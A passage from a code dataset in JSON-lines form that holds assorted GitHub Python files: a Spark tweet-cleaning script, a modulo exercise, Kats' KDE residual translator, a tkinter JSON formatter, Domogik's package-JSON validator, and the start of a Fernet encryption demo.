r\"http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\\\(\\\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+\"\n cleaned_text = re.sub(url_pattern, \"\", text)\n return cleaned_text\n\ndef clean_text( text,stops):\n \n \n \n \n\n if type(text)==type(\"s\"):\n #rimozione di tutte le parole che non hanno lunghezza maggiore di 2\n parsed_text=clean_text_from_emoj(text)\n parsed_text=delete_urls(parsed_text)\n parsed_text=remove_stops(parsed_text,stops) #rimozione stopwords\n parsed_text=delete_double_spaces(parsed_text)\n #parsed_text=lemming_text(parsed_text) #lemming delle parole\n \n else:\n parsed_text=text\n \n \n\n return parsed_text\n\n#create parser and set its arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--input_path\", type=str, help=\"Input file paths\")\nparser.add_argument(\"--output_path\", type=str, help=\"Output folder path\")\n\nargs = parser.parse_args()\ninput_filepath, output_filepath = args.input_path, args.output_path\n\n\n#stop words inglesi di nltk\nstops=stopwords.words(\"english\")\n# Define a list of file paths\nfile_paths = input_filepath #tutti i file che verranno combinati\n\nspark = SparkSession.builder.appName(\"CSV Integration\").getOrCreate()\n\n# Read the first CSV file into a DataFrame\ndf = spark.read.csv(input_filepath, header=True, inferSchema=True)\n\ncustom_partial = partial(clean_text, stops=stops)\n\nparse_text_udf = udf(custom_partial, StringType())\n\n# Apply the custom parsing function to the \"text\" column and create a new column \"parsed_text\"\ndf_with_parsed_text = df.withColumn(\"parsed_text\", parse_text_udf(\"text\"))\n\n\n\n\nfinal=df_with_parsed_text.drop(*[\"text\"])\n# Write the processed DataFrame to a new CSV file\nfinal.write.csv(output_filepath, header=True)\n\n# Stop the SparkSession\nspark.stop()\n\n\n\n","repo_name":"magicWiss/BIG_DATA_TWITTER_ANALYSIS","sub_path":"Logics/3_DataProcessing/TopicModeling/Parsing/dataCleaning4topicModeling.py","file_name":"dataCleaning4topicModeling.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"37457734478","text":"#107商业技艺竞赛模拟试题\r\n#Problem 3: 子题2:模数 (Modulo)\r\n#余数小于0,不过在python中余数没有负的,VB有,所以本题型应该不会再出了\r\nn=int(input())\r\n\r\nfor i in range(0,n):\r\n dend,dsor=map(int,input().split(\",\"))\r\n r=dend%dsor\r\n\t\r\n if(r<0):#余数小于0,不过在python中余数没有负的,VB有\r\n print((dsor)+r)\r\n else:\r\n print(r)\r\n","repo_name":"yotrew/commercial_skill_competition","sub_path":"107術科模擬試題/problem3-2.py","file_name":"problem3-2.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"41"} +{"seq_id":"71339553724","text":"from __future__ import annotations\n\nfrom typing import Optional\n\nimport numpy as np\nimport pandas as pd\nfrom kats.consts import TimeSeriesData\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.neighbors import KernelDensity\n\n\nclass KDEResidualTranslator:\n _kde: Optional[KernelDensity] = None\n\n def __init__(\n self, ignore_below_frac: float = 0, ignore_above_frac: float = 1\n ) -> None:\n \"\"\"\n Translates residuals (difference between outcome and prediction)\n to false-alarm probability using kernel density estimation\n on the residuals.\n\n Args:\n ignore_below_frac: Lower quantile to ignore during training\n (makes the translator more robust to outliers); default 0.\n ignore_above_frac: Upper quantile to ignore during training\n (makes the translator more robust to outliers); default 1.\n\n Examples:\n\n .. code-block:: py\n\n # ts_data is some data\n y = ts_data\n # We create a prediction by a rolling window of length 7\n yhat = pd.DataFrame({\n \"value\": self._y.value.rolling(7).mean().shift(1),\n \"time\": self._y.time})\n yhat = TimeSeriesData(yhat)\n\n trn = KDEResidualTranslator()\n\n # We can transform outcomes to probabilities using y and y_hat\n trn = trn.fit(y=y, yhat=yhat)\n proba = trn.predict(y)\n\n # We can transform outcomes to probabilities using residuals\n residual = self._y - self._yhat\n trn = trn.fit(residual=residual)\n proba = trn.predict(residual=residual)\n \"\"\"\n if ignore_below_frac < 0 or ignore_above_frac > 1:\n raise ValueError(\"Illegal ignore fractions\")\n if ignore_below_frac > ignore_above_frac:\n raise ValueError(\"Illegal ignore fractions\")\n self._ignore_below_frac = ignore_below_frac\n self._ignore_above_frac = ignore_above_frac\n\n def fit(\n self,\n y: Optional[TimeSeriesData] = None,\n yhat: Optional[TimeSeriesData] = None,\n yhat_lower: Optional[TimeSeriesData] = None,\n yhat_upper: Optional[TimeSeriesData] = None,\n residual: Optional[TimeSeriesData] = None,\n ) -> KDEResidualTranslator:\n \"\"\"\n Fits a dataframe to a model of the residuals.\n\n Args:\n df: A pandas DataFrame containg the following columns:\n\n 1. Either\n a. `residual`, or\n b. `y` and `yhat` with optionally both `yhat_lower` and\n `yhat_upper`\n 2. At most one of `ds` and `ts`\n \"\"\"\n residual = self._get_residual(y, yhat, yhat_lower, yhat_upper, residual)\n\n value = residual.value\n mask = value > value.quantile(self._ignore_below_frac)\n # pyre-fixme[58]: `&` is not supported for operand types\n # `Union[pd.core.frame.DataFrame, pd.core.series.Series]` and\n # `Union[pd.core.frame.DataFrame, pd.core.series.Series]`.\n mask &= value < value.quantile(self._ignore_above_frac)\n value = value[mask]\n\n kde = KernelDensity(bandwidth=10.0, kernel=\"gaussian\")\n extent = value.quantile(0.95) - value.quantile(0.05)\n params = {\n \"kernel\": [\"gaussian\"],\n \"bandwidth\": np.linspace(extent / 1000, extent / 10, 1000),\n }\n search = RandomizedSearchCV(\n kde, params, random_state=0, scoring=lambda k, x: k.score_samples(x).sum()\n )\n best_params = search.fit(value.to_frame()).best_params_\n kde = KernelDensity(**best_params)\n kde.fit(value.to_frame())\n self._kde = kde\n return self\n\n @property\n def kde_(self) -> Optional[KernelDensity]:\n \"\"\"\n Returns:\n KernelDensity object fitted to the residuals.\n \"\"\"\n return self._kde\n\n def predict_proba(\n self,\n y: Optional[TimeSeriesData] = None,\n yhat: Optional[TimeSeriesData] = None,\n yhat_lower: Optional[TimeSeriesData] = None,\n yhat_upper: Optional[TimeSeriesData] = None,\n residual: Optional[TimeSeriesData] = None,\n ) -> TimeSeriesData:\n \"\"\"\n Predicts the probability of a residual\n\n Args:\n df: A pandas DataFrame containg the following columns:\n\n 1. Either\n a. `residual`, or\n b. `y` and `yhat` with optionally both `yhat_lower` and\n `yhat_upper`\n 2. At most one of `ds` and `ts`\n\n Returns:\n A series where there is a probability corresponding to\n each instance (row) in the input.\n \"\"\"\n proba = self.predict_log_proba(y, yhat, yhat_lower, yhat_upper, residual)\n proba.value = np.exp(proba.value)\n return proba\n\n def predict_log_proba(\n self,\n y: Optional[TimeSeriesData] = None,\n yhat: Optional[TimeSeriesData] = None,\n yhat_lower: Optional[TimeSeriesData] = None,\n yhat_upper: Optional[TimeSeriesData] = None,\n residual: Optional[TimeSeriesData] = None,\n ) -> TimeSeriesData:\n \"\"\"\n Predicts the natural-log probability of a residual\n\n Args:\n df: A pandas DataFrame containg the following columns:\n\n 1. Either\n a. `residual`, or\n b. `y` and `yhat` with optionally both `yhat_lower` and\n `yhat_upper`\n 2. At most one of `ds` and `ts`\n\n Returns:\n A series where there is a probability corresponding to\n each instance (row) in the input.\n \"\"\"\n residual = self._get_residual(y, yhat, yhat_lower, yhat_upper, residual)\n for _ in range(30):\n print(type(residual))\n\n log_proba = pd.DataFrame(\n {\n # pyre-fixme[16]: `KDEResidualTranslator` has no attribute `_kde`.\n \"value\": self._kde.score_samples(residual.value.to_frame()),\n \"time\": residual.time,\n },\n copy=False,\n )\n\n return TimeSeriesData(log_proba)\n\n def _get_residual(\n self,\n y: Optional[TimeSeriesData],\n yhat: Optional[TimeSeriesData],\n yhat_lower: Optional[TimeSeriesData],\n yhat_upper: Optional[TimeSeriesData],\n residual: Optional[TimeSeriesData],\n ) -> TimeSeriesData:\n if yhat is not None:\n if y is None:\n raise ValueError(\"Must include y if supplying yhat\")\n if residual is not None:\n raise ValueError(\"Must not include residuals if supplying yhat\")\n residual = y - yhat\n if (yhat_lower is not None) != (yhat_upper is not None):\n raise ValueError(\n \"Must supply either both yhat_lower and yhat_upper\" \"or neither\"\n )\n if yhat_lower is not None:\n assert yhat_upper is not None\n assert yhat_lower is not None\n residual /= yhat_upper - yhat_lower\n elif residual is not None:\n if any(c is not None for c in [y, yhat, yhat_lower, yhat_upper]):\n raise ValueError(\n \"Must not include y, yhat, yhat_lower, yhat_upper\"\n \"if supplying residuals\"\n )\n else:\n raise ValueError(\"Must supply y and yhat or residual\")\n\n nulls = residual.value.isnull()\n residual.value = residual.value[~nulls]\n residual.time = residual.time[~nulls]\n return residual\n","repo_name":"facebookresearch/Kats","sub_path":"kats/detectors/residual_translation.py","file_name":"residual_translation.py","file_ext":"py","file_size_in_byte":7698,"program_lang":"python","lang":"en","doc_type":"code","stars":4597,"dataset":"github-code","pt":"41"} +{"seq_id":"18953353689","text":"import pytz\nimport datetime\n\nliste1 = ['a', 'b', 'c']\nliste2 = ['c', 'a']\nelem1 = 'c'\nelem2 = 'a'\n\nif elem1 in liste1 and elem2 in liste1:\n print(\"Elem1 et 2 dans liste\")\nelse:\n print(\"Elem1 et 2 pas dans liste\")\n\ntz = pytz.timezone(\"EST\")\nnow = datetime.datetime.now(tz=tz)\nprint(\"Now: %s\" % str(now))\n","repo_name":"dugrema/millegrilles.consignation.python","sub_path":"test/liste_tests.py","file_name":"liste_tests.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"17900589730","text":"# -*- coding: UTF-8 -*-\n\"\"\"\nProject :python_prac \nFile :prac_02json格式化小工具.py\nAuthor :张以白\nDate :2023/7/27 2:30\n使用tkinter+json实现格式化json的一个小工具\n\"\"\"\nimport tkinter\nfrom tkinter import *\nimport json\nimport math\nfrom tkinter import ttk\n\n\nclass Application(Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n self.pack()\n self.creatWidget()\n\n def json_format(self):\n try:\n self.data = self.entry1.get()\n # # 将JSON字符串解析为Python对象\n json_data = json.loads(self.data) #\n # # load从文件中加载 loads是json字符串转成python结构\n # # dump写入文件 dumps是python结构转成json字符串\n\n with open(\"./test.json\", \"w\", encoding=\"utf-8\") as f:\n json.dump(json_data, f, indent=5)\n print(json_data)\n # # json.dump()将Python对象写入文件\n # 创建提示标签\n self.tip_label = Label(self, text=\"已经生成!存放test.json中\")\n self.tip_label.pack()\n except:\n\n self.tip_label = Label(self, text=\"json格式有误!\")\n self.tip_label.pack()\n\n #\n def creatWidget(self):\n self.label1 = Label(self, text=\"请输入json数据\")\n self.label1.pack()\n v1 = StringVar()\n self.entry1 = Entry(self, textvariable=v1, width=40)\n v1.set(\"请输入你想格式化的json数据\")\n self.entry1.pack()\n\n self.btn1 = Button(self, text=\"开始转换\")\n # self.btn1.bind(\"\",lambda event: self.turnover())\n self.btn1.bind(\"\", lambda event: [self.json_format()])\n self.btn1.pack()\n\n def nextwedgit(self):\n print(\"调用后的按钮信息\")\n self.label2 = Label(self, text=\"格式化后数据\", width=10, height=1)\n self.label2.pack(side=\"left\")\n\n # 创建一个Frame,用于在文本框和按钮之间创建空间\n spacer_frame = Frame(self)\n spacer_frame.pack(side=\"left\") # 使用padx来增加水平间距\n\n # 文本编辑区\n self.textpad = Text(self)\n self.textpad.pack()\n\n\nif __name__ == '__main__':\n # json_format(data=shujv)\n root = Tk()\n # 设置窗口大小\n window_width = 500\n window_height = 400\n\n # 获取屏幕的宽度和高度\n screen_width = root.winfo_screenwidth()\n screen_height = root.winfo_screenheight()\n\n # 计算窗口在屏幕上的坐标\n x = math.floor((screen_width - window_width) / 2)\n y = math.floor((screen_height - window_height) / 2)\n\n # 设置窗口位置\n root.geometry(f\"{window_width}x{window_height}+{x}+{y}\")\n root.title(\"json格式化工具\")\n # 设置窗口背景色彩\n root.configure(bg=\"#F2F2F2\") # 设置背景颜色为浅灰色\n\n app = Application(master=root)\n\n # ��行主循环\n root.mainloop()\n","repo_name":"1490625639/python_prac","sub_path":"prac_18json/prac_02json格式化小工具.py","file_name":"prac_02json格式化小工具.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"70935830843","text":"import traceback\nimport datetime\nimport json\nfrom domogik.common.configloader import Loader\nfrom domogik import __version__ as DMG_VERSION\ntry:\n # python3\n from urllib.request import urlopen\nexcept ImportError:\n # python2\n from urllib import urlopen\n\n#TODO : why this import fails ?\n#from domogik.xpl.common.plugin import PACKAGES_DIR\nPACKAGES_DIR = \"domogik_packages\"\n\n\n\n\n\nclass PackageException(Exception):\n \"\"\"\n Package exception\n \"\"\"\n\n def __init__(self, value):\n Exception.__init__(self)\n self.value = value\n\n def __str__(self):\n return repr(self.value)\n\n\nclass PackageJson():\n \"\"\" PackageJson class\n load the file into a json and complete it\n \"\"\"\n def __init__(self, name = None, url = None, path = None, pkg_type = \"plugin\", data = None):\n \"\"\" Read json file of a plugin and make an object from it\n @param name : name of package\n @param url : url of file\n @param path : path of file\n @param pkg_type : package type (default : 'plugin')\n To use only with name != None\n @param data : json data as a python object. Used by package.py when installing a zip file : the json is read from memory\n \"\"\"\n json_file = None\n try:\n # get config\n cfg = Loader('domogik')\n config = cfg.load()\n conf = dict(config[1])\n self.resources_dir = \"{0}/resources\".format(conf['libraries_path'])\n # load from sources repository\n if name != None:\n\n if pkg_type in [\"plugin\", \"brain\", \"interface\"]:\n json_file = \"{0}/{1}/{2}_{3}/info.json\".format(conf['libraries_path'], PACKAGES_DIR, pkg_type, name)\n icon_file = \"{0}/{1}/{2}_{3}/design/icon.png\".format(conf['libraries_path'], PACKAGES_DIR, pkg_type, name)\n # TODO : reactivate later\n #elif pkg_type == \"external\":\n # if 'package_path' in conf:\n # json_directory = \"%s/domogik_packages/externals/\" % (conf['package_path'])\n # else:\n # json_directory = \"%s/%s\" % (conf['src_prefix'], \"share/domogik/externals/\")\n else:\n raise PackageException(\"Type '{0}' doesn't exists\".format(pkg_type))\n #json_file = \"{0}/{1}.json\".format(json_directory, name)\n\n self.json = json.load(open(json_file))\n elif path != None:\n json_file = path\n icon_file = None\n self.json = json.load(open(json_file))\n\n elif url != None:\n json_file = url\n icon_file = None\n json_data = urlopen(json_file)\n # TODO : there is an error here!!!!!\n self.json = json.load(xml_data)\n\n elif data != None:\n json_file = None\n icon_file = None\n self.json = data\n\n json_file = \"{0}/datatypes.json\".format(self.resources_dir)\n self._datatypes = None\n try:\n self._datatypes = json.load(open(json_file))\n except:\n raise PackageException(\"Error while reading datatypes json file '{0}'. Error is : {1}\".format(json_file, traceback.format_exc()))\n\n self.validate()\n\n ### complete json\n # identity data\n self.json[\"identity\"][\"package_id\"] = \"{0}-{1}\".format(self.json[\"identity\"][\"type\"],\n self.json[\"identity\"][\"name\"])\n self.json[\"identity\"][\"icon_file\"] = icon_file\n\n if not self.json[\"identity\"].has_key(\"xpl_clients_only\"):\n self.json[\"identity\"][\"xpl_clients_only\"] = False\n\n if not self.json[\"identity\"].has_key(\"compliant_xpl_clients\"):\n self.json[\"identity\"][\"compliant_xpl_clients\"] = []\n\n # common configuration items\n # to add only for a plugin with identity>xpl_clients_only not set to True !\n if self.json[\"identity\"][\"type\"] in [\"plugin\", \"interface\"] and not (self.json[\"identity\"].has_key(\"xpl_clients_only\") and self.json[\"identity\"][\"xpl_clients_only\"] == True):\n auto_startup = {\n \"default\": False,\n \"description\": \"Automatically start the client at Domogik startup\",\n \"key\": \"auto_startup\",\n \"name\" : \"Start the client with Domogik\",\n \"required\": True,\n \"type\": \"boolean\"\n }\n # check that auto_startup key is not already defined in the json\n for config_elt in self.json[\"configuration\"]:\n if config_elt[\"key\"] == \"auto_startup\":\n raise PackageException(\"Configuration parameter 'auto_startup' has not to be defined in the json file. Please remove it\")\n self.json[\"configuration\"].insert(0, auto_startup)\n \n\n\n except PackageException as exp:\n raise PackageException(exp.value)\n except:\n raise PackageException(\"Error reading json file : {0} : {1}\".format(json_file, str(traceback.format_exc())))\n\n\n #def cache_xml(self, cache_folder, url, repo_url, priority):\n # \"\"\" Add package url info in xml data\n # Store xml in a file in cache_folder\n # @param cache_folder : folder to put xml file\n # @param url : package url\n # @param repo_url : repository url\n # @param priority : repository priority\n # \"\"\"\n # top_elt = self.xml_content.documentElement\n # new_elt = self.xml_content.createElementNS(None, 'repository')\n # new_elt.setAttribute(\"package\", url)\n # new_elt.setAttribute(\"priority\", priority)\n # new_elt.setAttribute(\"source\", repo_url)\n # top_elt.appendChild(new_elt)\n # cache_file = open(\"{0}/{1}\".format(cache_folder, self.json_filename), \"w\") \n # cache_file.write(self.xml_content.toxml().encode(\"utf-8\"))\n # cache_file.close()\n\n #def set_repo_source(self, source):\n # \"\"\" Add source info in xml data\n # Store in xml the repository from which it comes\n # @param source : repository url\n # \"\"\"\n # top_elt = self.xml_content.documentElement\n # new_elt = self.xml_content.createElementNS(None, 'repository')\n # new_elt.setAttribute(\"source\", source)\n # top_elt.appendChild(new_elt)\n # my_file = open(\"{0}\".format(self.info_file), \"w\") \n # my_file.write(self.xml_content.toxml().encode(\"utf-8\"))\n # my_file.close()\n\n def validate(self):\n if self.json[\"json_version\"] == 2:\n self._validate_02()\n if 'identity' in self.json.keys() and 'domogik_min_version' in self.json['identity']:\n if self.json['identity']['domogik_min_version'] > DMG_VERSION:\n raise PackageException(\"Domogik version check failed! min_version={0} current version={1}\".format(self.json['identity']['domogik_min_version'], DMG_VERSION));\n else:\n return False\n\n def _validate_keys(self, expected, name, lst, optional=[]):\n for exp in expected:\n if exp not in lst:\n raise PackageException(\"key '{0}' not found in {1}\".format(exp, name))\n explst = expected + optional\n for item in lst:\n if item not in explst:\n raise PackageException(\"unknown key '{0}' found in {1}\".format(item, name))\n\n def _validate_dataType(self, msg, dataType):\n if dataType not in self._datatypes:\n raise PackageException(msg)\n\n def _validate_02(self):\n fieldTypes = [\"boolean\", \"string\", \"choice\", \"date\", \"time\", \"datetime\", \"float\", \"integer\", \"email\", \"ipv4\", \"ipv6\", \"url\", \"password\"]\n try:\n #check that all main keys are in the file\n expected = [\"configuration\", \"xpl_commands\", \"xpl_stats\", \"commands\", \"sensors\", \"device_types\", \"identity\", \"json_version\"]\n self._validate_keys(expected, \"file\", self.json.keys(), [\"products\", \"external\"])\n\n # validate identity\n expected = [\"author\", \"author_email\", \"description\", \"domogik_min_version\", \"name\", \"type\", \"version\"]\n optional = [\"tags\", \"dependencies\", \"package_id\", \"icon_file\", \"xpl_clients_only\", \"compliant_xpl_clients\"]\n if type(self.json[\"identity\"]) != dict:\n raise PackageException(\"Identity part is NOT a dictionary!\")\n self._validate_keys(expected, \"an identity param\", self.json[\"identity\"].keys(), optional)\n\n # validate configuration\n expected = [\"default\", \"description\", \"key\", \"name\", \"required\", \"type\"]\n optional = [\"sort\", \"max_value\", \"min_value\", \"choices\", \"mask\", \"multiline\"]\n if type(self.json[\"configuration\"]) != list:\n raise PackageException(\"Configuration part is NOT a list!\")\n for conf in self.json[\"configuration\"]:\n self._validate_keys(expected, \"a configuration item param\", conf.keys(), optional)\n if conf['type'] not in fieldTypes:\n raise PackageException(\"Type ({0}) in a config item is not in the allowed list: {1}\".format(conf['type'], fieldTypes))\n\n # validate products\n if 'products' in self.json.keys():\n expected = [\"name\", \"id\", \"documentation\", \"type\"]\n for prod in self.json['products']:\n self._validate_keys(expected, \"a product\", prod.keys())\n\n #validate the device_type\n if type(self.json[\"device_types\"]) != dict:\n raise PackageException(\"Device_types part is NOT a dictionary!\")\n for devtype in self.json[\"device_types\"]:\n devt = self.json[\"device_types\"][devtype]\n expected = ['id', 'name', 'description', 'commands', 'sensors', 'parameters']\n self._validate_keys(expected, \"device_type {0}\".format(devtype), devt.keys())\n #check that all commands exists inisde each device_type\n if type(devt[\"commands\"]) != list:\n raise PackageException(\"Commands list for device_type {0} is NOT a list!\".format(devtype))\n for cmd in devt[\"commands\"]:\n if cmd not in self.json[\"commands\"].keys(): \n raise PackageException(\"cmd {0} defined in device_type {1} is not found\".format(cmd, devtype))\n #check that all sensors exists inside each device type\n if type(devt[\"sensors\"]) != list:\n raise PackageException(\"Sensors list for device_type {0} is NOT a list!\".format(devtype))\n for sens in devt[\"sensors\"]:\n if sens not in self.json[\"sensors\"].keys(): \n raise PackageException(\"sensor {0} defined in device_type {1} is not found\".format(sens, devtype))\n #see that each xplparam inside device_type has the following keys: key, description, type\n expected = [\"key\", \"type\", \"description\", \"xpl\"]\n optional = [\"max_value\", \"min_value\", \"choices\", \"mask\", \"multiline\", \"default\"]\n if type(devt[\"parameters\"]) != list:\n raise PackageException(\"Parameters list for device_type {0} is NOT a list!\".format(devtype))\n for par in devt[\"parameters\"]:\n self._validate_keys(expected, \"a param for device_type {0}\".format(devtype), par.keys(), optional)\n if par['type'] not in fieldTypes:\n raise PackageException(\"Type ({0}) in a config item is not in the allowed list: {1}\".format(par['type'], fieldTypes))\n\n #validate the commands\n if type(self.json[\"commands\"]) != dict:\n raise PackageException(\"Commands part is NOT a dictionary!\")\n for cmdid in self.json[\"commands\"]:\n cmd = self.json[\"commands\"][cmdid]\n expected = ['name', 'return_confirmation', 'parameters']\n optional = ['xpl_command']\n self._validate_keys(expected, \"command {0}\".format(cmdid), cmd.keys(), optional)\n # validate the params\n expected = ['key', 'data_type', 'conversion']\n if type(cmd['parameters']) != list:\n raise PackageException(\"Parameters for command {0} is not a list\".format(cmdid))\n for par in cmd['parameters']:\n self._validate_keys(expected, \"a param for command {0}\".format(cmdid), par.keys())\n self._validate_dataType(\"DataType in command {0} is not valid\".format(cmdid), par['data_type'])\n # see that the xpl_command is defined\n if \"xpl_command\" in cmd and cmd[\"xpl_command\"] not in self.json[\"xpl_commands\"].keys():\n raise PackageException(\"xpl_command {0} defined in command {1} is not found\".format(cmd[\"xpl_command\"], cmdid))\n\n #validate the sensors\n if type(self.json[\"sensors\"]) != dict:\n raise PackageException(\"Sensor part is NOT a dictionary!\")\n for senid in self.json[\"sensors\"]:\n sens = self.json[\"sensors\"][senid]\n expected = ['name', 'data_type', 'conversion', 'history', 'incremental', 'timeout']\n hexpected = ['store', 'max', 'expire', 'round_value', 'duplicate']\n self._validate_keys(expected, \"sensor {0}\".format(senid), list(sens.keys()))\n self._validate_keys(hexpected, \"sensor {0} history\".format(senid), list(sens['history'].keys()))\n self._validate_dataType(\"DataType in sensor {0} is not valid\".format(senid), sens['data_type'])\n\n #validate the xpl command\n if type(self.json[\"xpl_commands\"]) != dict:\n raise PackageException(\"Xpl_commands part is NOT a dictionary!\")\n for xcmdid in self.json[\"xpl_commands\"]:\n xcmd = self.json[\"xpl_commands\"][xcmdid]\n expected = [\"name\", \"schema\", \"xplstat_name\", \"parameters\"]\n self._validate_keys(expected, \"xpl_command {0}\".format(xcmdid), xcmd.keys())\n # parameters\n expected = [\"static\", \"device\"]\n self._validate_keys(expected, \"parameters for xpl_command {0}\".format(xcmdid), xcmd['parameters'].keys())\n # static parameter\n expected = [\"key\", \"value\"]\n if type(xcmd['parameters']['static']) != list:\n raise PackageException(\"Static parameters for xpl_command {0} is not a list\".format(xcmdid))\n for stat in xcmd['parameters']['static']:\n self._validate_keys(expected, \"a static parameter for xpl_command {0}\".format(xcmdid), stat.keys())\n # device parameter\n expected = [\"key\", \"description\", \"type\"]\n optional = [\"default\"]\n if type(xcmd['parameters']['device']) != list:\n raise PackageException(\"Device parameters for xpl_command {0} is not a list\".format(xcmdid))\n for stat in xcmd['parameters']['device']:\n self._validate_keys(expected, \"a device parameter for xpl_command {0}\".format(xcmdid), stat.keys(), optional)\n if stat['type'] not in fieldTypes:\n raise PackageException(\"Type ({0}) in a config item is not in the allowed list: {1}\".format(stat['type'], fieldTypes))\n # see that the xpl_stat is defined\n if xcmd[\"xplstat_name\"] not in self.json[\"xpl_stats\"].keys():\n raise PackageException(\"xplstat_name {0} defined in xpl_command {1} is not found\".format(xcmd[\"xplstat_name\"], xcmdid))\n\n #validate the xpl stats\n if type(self.json[\"xpl_stats\"]) != dict:\n raise PackageException(\"Xpl_stats part is NOT a dictionary!\")\n for xstatid in self.json[\"xpl_stats\"]:\n xstat = self.json[\"xpl_stats\"][xstatid]\n expected = [\"name\", \"schema\", \"parameters\"]\n self._validate_keys(expected, \"xpl_command {0}\".format(xstatid), xstat.keys())\n # parameters\n expected = [\"static\", \"device\", \"dynamic\"]\n self._validate_keys(expected, \"parameters for xpl_stat {0}\".format(xstatid), xstat['parameters'].keys())\n # static parameter\n expected = [\"key\", \"value\"]\n if type(xstat['parameters']['static']) != list:\n raise PackageException(\"Static parameters for xpl_stat {0} is not a list\".format(xstatid))\n for stat in xstat['parameters']['static']:\n self._validate_keys(expected, \"a static parameter for xpl_stat {0}\".format(xstatid), stat.keys())\n # device parameter\n expected = [\"key\", \"description\", \"type\"]\n optional = [\"default\", \"multiple\"]\n if type(xstat['parameters']['device']) != list:\n raise PackageException(\"Device parameters for xpl_stat {0} is not a list\".format(xstatid))\n for stat in xstat['parameters']['device']:\n self._validate_keys(expected, \"a device parameter for xpl_stat {0}\".format(xstatid), stat.keys(), optional)\n if stat['type'] not in fieldTypes:\n raise PackageException(\"Type ({0}) in a config item is not in the allowed list: {1}\".format(stat['type'], fieldTypes))\n # dynamic parameter\n expected = [\"key\", \"sensor\"]\n opt = [\"ignore_values\"]\n if type(xstat['parameters']['dynamic']) != list:\n raise PackageException(\"Dynamic parameters for xpl_stat {0} is not a list\".format(xstatid))\n for stat in xstat['parameters']['dynamic']:\n self._validate_keys(expected, \"a dynamic parameter for xpl_stat {0}\".format(xstatid), stat.keys(), opt)\n # check that the sensor exists\n if stat['sensor'] not in self.json[\"sensors\"].keys(): \n raise PackageException(\"sensor {0} defined in xpl_stat {1} is not found\".format(stat['sensor'], xstatid))\n except PackageException as exp:\n raise PackageException(\"Error validating the json: {0}\".format(exp.value))\n\n def set_generated(self, path):\n \"\"\" Add generation date info in json data\n @param path : path to json file\n \"\"\"\n my_json = json.load(open(path))\n my_json[\"identity\"][\"generated\"] = str(datetime.datetime.now())\n my_file = open(path, \"w\")\n my_file.write(json.dumps(my_json))\n my_file.close()\n\n def get_json(self):\n \"\"\" Return the json data\n \"\"\"\n return self.json\n\n def display(self):\n \"\"\" Display xml data in a fine way\n \"\"\"\n print(u\"---- Package informations -------------------------------\")\n print(u\"Type : {0}\".format(self.json[\"identity\"][\"type\"]))\n print(u\"Name : {0}\".format(self.json[\"identity\"][\"name\"]))\n print(u\"Package id : {0}\".format(self.json[\"identity\"][\"package_id\"]))\n print(u\"Version : {0}\".format(self.json[\"identity\"][\"version\"]))\n print(u\"Tags : {0}\".format(self.json[\"identity\"][\"tags\"]))\n print(u\"Link for doc : {0}\".format(self.json[\"identity\"][\"documentation\"]))\n print(u\"Description : {0}\".format(self.json[\"identity\"][\"description\"]))\n print(u\"Changelog : {0}\".format(self.json[\"identity\"][\"changelog\"]))\n print(u\"Author : {0}\".format(self.json[\"identity\"][\"author\"]))\n print(u\"Author's email : {0}\".format(self.json[\"identity\"][\"author_email\"]))\n print(u\"Domogik min version : {0}\".format(self.json[\"identity\"][\"domogik_min_version\"]))\n print(u\"---------------------------------------------------------\")\n\n def find_xplstats_for_device_type(self, devtype):\n if self.json[\"json_version\"] != 2:\n return \"Bad json version for the plugin\"\n ret = {}\n # loop over all xplstat params and see if the sensor is linked to the above list\n for xstatid in self.json[\"xpl_stats\"]:\n xstat = self.json[\"xpl_stats\"][xstatid]\n for stat in xstat['parameters']['dynamic']:\n if stat['sensor'] in self.json[\"device_types\"][devtype]['sensors']:\n if stat['sensor'] not in ret:\n ret[stat['sensor']] = []\n ret[stat['sensor']].append( xstatid )\n \n return ret\n\n\ndef set_nightly_version(path):\n \"\"\" update version for the nightly build\n @param path : path to json file\n \"\"\"\n my_json = json.load(open(path))\n # suffix the version with .devYYYYMMDD\n suffix = \".dev{0}\".format(datetime.datetime.now().strftime('%Y%m%d'))\n my_json[\"identity\"][\"version\"] += suffix\n my_file = open(path, \"w\")\n my_file.write(json.dumps(my_json))\n my_file.close()\n\nif __name__ == \"__main__\":\n pjson = PackageJson(\"plcbus\")\n pjson = PackageJson(\"velbus\")\n","repo_name":"domogik/domogik","sub_path":"src/domogik/common/packagejson.py","file_name":"packagejson.py","file_ext":"py","file_size_in_byte":21598,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"41"} +{"seq_id":"6122610339","text":"# en este codigo implementamos un proceso de cifrado y descifrado de archivos utilizando la biblioteca de criptografia \"cryptography\"\nfrom cryptography.fernet import Fernet\nimport time\n\n\ninicioE2 = time.time()\n#Etapa 2: Generar y/o imprimir la(las) claves de cifrado\n#Escribir y guardar clave\n\n#genera_clave genera una nueva clave de cifrado utilizando la clase fernet \ndef genera_clave():\n \n clave = Fernet.generate_key()\n\n with open(\"clave.key\",\"wb\") as archivo_clave: # la clave se guarda en un archivo llamado clave.key\n archivo_clave.write(clave)\n with open('clave.key','r') as clave_lectura:\n print(\"La clave generada es: \")\n print(clave_lectura.read())\n\n#cargar clave\ndef cargar_clave():\n return open(\"clave.key\",\"rb\").read()\n\n#generar clave\ngenera_clave()\n#cargar clave\nclave = cargar_clave()\nfinE2 = time.time()\n\n\ninicioE1 = time.time()\n\n#Etapa 1: Leer el archivo\n# abre y lee el contenido del archivo .txt utilizando el modo de lectura del texto rt\nnom_archivo= \"10 palabras.txt\"\n\ndef leerArchivo():\n stream = open(\"10 palabras.txt\", \"rt\", encoding=\"utf-8\")\n print(stream.read())\nleerArchivo()\nfinE1 = time.time()\n\n\ninicioE3 = time.time()\n\n#Etapa 3: 